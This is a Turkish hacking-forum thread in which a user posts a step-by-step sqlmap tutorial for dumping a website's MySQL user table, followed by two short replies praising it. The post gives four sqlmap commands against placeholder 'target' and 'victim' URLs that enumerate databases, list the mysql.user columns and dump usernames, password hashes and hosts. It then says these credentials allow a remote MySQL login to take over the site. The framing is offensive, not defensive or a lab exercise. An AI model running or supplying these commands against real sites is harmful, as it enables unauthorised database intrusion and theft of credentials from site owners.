Sqlmap ile mysql database hack

'Hack Dökümanları' forumunda Sagittarius tarafından 2 Aralık 2017 tarihinde açılan konu

  1. Sagittarius

    Sagittarius DAYI Altın Üye

    Mesaj:
    289
    Beğeniler:
    673
    Cinsiyet:
    Erkek
    Şehir:
    Hollanda
    Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;

    sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent --dbs

    [​IMG]

    Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
    Hemen mysql veritabanındaki tabloları çekiyoruz;

    sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables


    ve ardından User tablomuzdaki kolonları çekiyoruz;



    sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns


    Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.

    sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump

    ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
     
    SoulFly bunu beğendi.
  2. SoulFly

    SoulFly Kayıtlı Üye

    Mesaj:
    12
    Beğeniler:
    9
    Eline sağlık dayı :)
     
  3. Fatalite

    Fatalite Emir Veren | Emir Alan ? Kayıtlı Üye

    Mesaj:
    565
    Beğeniler:
    481
    Şehir:
    MEXICO LOS CABOS
    Sağlam konu
     
Yükleniyor...

Bu Sayfayı Paylaş